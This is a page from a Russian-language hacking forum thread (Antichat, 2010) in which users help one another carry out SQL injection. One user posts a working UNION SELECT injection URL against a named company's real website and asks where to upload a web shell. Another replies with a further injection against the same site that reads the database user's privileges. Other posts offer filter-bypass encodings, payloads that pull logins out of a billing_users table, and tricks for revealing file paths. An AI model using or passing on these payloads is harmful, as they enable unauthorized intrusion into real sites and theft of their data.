ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12911  
Старый 05.05.2010, 19:25
Аватар для durito
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию

b82a комментарий если убрать, то доступен, вылетает ошибка
 
Ответить с цитированием

  #12912  
Старый 05.05.2010, 19:56
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

значит фильтруется --
 
Ответить с цитированием

  #12913  
Старый 05.05.2010, 20:03
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

попробуй:
#
%-%-
%2D%2D
 
Ответить с цитированием

  #12914  
Старый 05.05.2010, 21:08
Аватар для Mysterious
Mysterious
Познающий
Регистрация: 15.11.2009
Сообщений: 59
Провел на форуме:
1132797

Репутация: 32
Отправить сообщение для Mysterious с помощью ICQ Отправить сообщение для Mysterious с помощью AIM Отправить сообщение для Mysterious с помощью MSN Отправить сообщение для Mysterious с помощью Yahoo
По умолчанию

del

Последний раз редактировалось Mysterious; 06.05.2010 в 13:24..
 
Ответить с цитированием

  #12915  
Старый 05.05.2010, 21:31
Аватар для FlaktW
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7,8,9+--+

file_priv:Y

Не могу найти админку, phpmyadmin или ftp.
Не могу прочитать файлы чтобы найти путь куда залить shell.

Что можете посоветовать?
 
Ответить с цитированием

  #12916  
Старый 05.05.2010, 23:14
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

Цитата:
подскажите плиз по скуле. в общем подобрал все нужное и колво столбцов и имя таблицы. делаю запрос на несуществующее поле - вылетает ошибка (как положено) Ввожу запрос правильный (через скулю) он не выводит информацию из БД а тупо отображает то что было если бы я не вставлял скулю. ' UNION SELECT 1, login FROM billing_users LIMIT 0,1 -- выдает страницу без изменений ' UNION SELECT 1, login1 FROM billing_users LIMIT 0,1 -- A Database Error Occurred Error Number: 1054 Unknown column 'login1' in 'field list' SELECT login, email FROM billing_users WHERE login = '' UNION SELECT 1, login1 FROM billing_users LIMIT 0,1 -- ' OR email = '' То есть запрос вроде верный в 1ом случае а он ничего не выводит, ни на страницу, не в исходнике =( Это я так понимаю Blind SQL Injection и тут методом перебора только ? или как?
нет не блинд....
причины:
1)таблица находится в другой базе
2)таблица пустая
3)проблемы с кодировками

решение:
1)придется смириться
2)для mysql4
' UNION SELECT 1, count(*) FROM billing_users--
для mysql5
' UNION SELECT 1, table_rows FROM information_schema.tables where table_name= 'billing_users'--
если вывело 0 значит таблица пустая
3)' UNION SELECT 1, unhex(hex(login)) FROM billing_users LIMIT 0,1 --
' UNION SELECT 1, aes_decrypt(aes_encrypt(login,12),12) FROM billing_users LIMIT 0,1 --
 
Ответить с цитированием

  #12917  
Старый 05.05.2010, 23:16
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

Цитата:
http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7,8,9+--+ file_priv:Y Не могу найти админку, phpmyadmin или ftp. Не могу прочитать файлы чтобы найти путь куда залить shell. Что можете посоветовать?
можно с BENCHMARK поколдовать чтоб вывело полный путь
 
Ответить с цитированием

  #12918  
Старый 05.05.2010, 23:26
Аватар для diehard
diehard
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715

Репутация: 659


Отправить сообщение для diehard с помощью ICQ
По умолчанию

Цитата:
Сообщение от FlaktW  
http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7,8,9+--+

file_priv:Y

Не могу найти админку, phpmyadmin или ftp.
Не могу прочитать файлы чтобы найти путь куда залить shell.

Что можете посоветовать?
нету у тебя там файл_прива, дядя

http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(':',user(),user ,file_priv),6,7,8,9 from mysql.user where user='tecmath'--+
tecmath@localhost:tecmath:N
 
Ответить с цитированием

  #12919  
Старый 06.05.2010, 06:34
Аватар для EoGeneo
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861

Репутация: 5
Отправить сообщение для EoGeneo с помощью ICQ
По умолчанию

Здравствуйте всем!
Sql-inj начал заниматься недавно, всё очень хорошо получается, но возник вопрос есть ли софт, который может помочь сдампипть базу через inj?
 
Ответить с цитированием

  #12920  
Старый 06.05.2010, 09:36
Аватар для mr.celt
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию

Тебе под MySql или MSSql?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ